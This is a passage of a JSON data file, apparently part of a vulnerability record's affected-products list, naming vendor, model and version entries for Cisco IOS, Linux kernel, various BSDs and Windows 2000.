      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)t3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xf"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)xz7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)ya2"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "4.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1cx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "4.1.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sxd"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.4.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(22\\)eb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(28c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)bc1f"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)xy4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1yc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(6.8\\)t1a"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.4"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "2.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(3\\)t2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1aa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)ja1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.13"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(26\\)s6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6.5\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)xv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)t1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(11d\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)ya9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(15a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(14\\)"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "2.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)t14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(15a\\)p"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13e\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(1\\)ed"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17a\\)"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "3.0.1"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(7a\\)"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.1.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)s4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)eo"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(1b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "8.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(4\\)f1"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(19.3\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1t"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.42"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0\\(17\\)bt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xd"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)t"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11b\\)e14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20\\)sx"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.61"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "3.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(15\\)aa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)ja1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "5.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ze"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)ja"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.46"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(18\\)s5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(11b\\)t2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(26\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)xl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xi1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sxd5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "9.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yr"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(7\\)ca"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ex"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3ya"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)ja"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3a\\)t4"
      },
      {
        "model": "dragonflybsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dragonflybsd",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xr"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xy"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(2\\)e1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(19a\\)gs6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(7\\)da2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)ys_1.2\\(1\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(16\\)aa"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "4.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.48"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10\\)ey"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)s8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ey"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3a\\)e7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13.4\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yf2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ys"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "4.1.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8\\)ea2b"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)e1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(4\\)xm1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8b\\)e16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zh8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.31"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)xy5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)bc2h"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(22\\)ea4a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3aa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(24\\)s5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(11\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)ya7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16\\)sc3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(4\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.27"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)t8"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(17\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)ja1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.23"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "2.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yf4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4ja"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)mx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xb14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1da"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)xf"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1a\\)t1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(12b\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2wa4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yf4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc5a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1b\\)da1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)xk2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)xc1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "trustedbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "trustedbsd",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.35"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)s2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "1.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)ya10"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(19\\)b"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ez1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xz"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)sx1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(4\\)xe1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zn"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)tpc11a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zh"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xk1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.42"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(10.5\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12\\)da3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yz"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "3.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2t"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.6.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12\\)da8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ev"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.66"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11\\)ec"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sxd1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)tpc10a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)ea1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(25\\)w5\\(27\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)ja"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1eb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xi2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(8\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2cy"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xu"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(9\\)ea"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(3.2\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "1.3.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(10e\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)xk2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)s9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)zo"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)sl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(2\\)xf"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.13"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
